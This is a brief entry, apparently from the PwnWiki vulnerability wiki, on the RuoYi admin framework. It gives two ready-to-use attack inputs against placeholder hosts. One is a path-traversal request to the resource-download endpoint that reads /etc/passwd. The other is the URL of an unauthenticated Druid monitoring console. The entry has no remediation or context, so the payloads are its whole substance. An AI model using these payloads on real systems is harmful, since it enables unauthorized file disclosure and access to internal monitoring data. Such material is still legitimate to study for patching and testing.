Loading
0

若依 任意文件读取&未授权访问漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

任意文件读取

https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd

未授权访问

http://xxx.xxx.xxx.xxx/prod-api/druid/index.html

免费、自由、人人可编辑的漏洞库--pwnwiki.com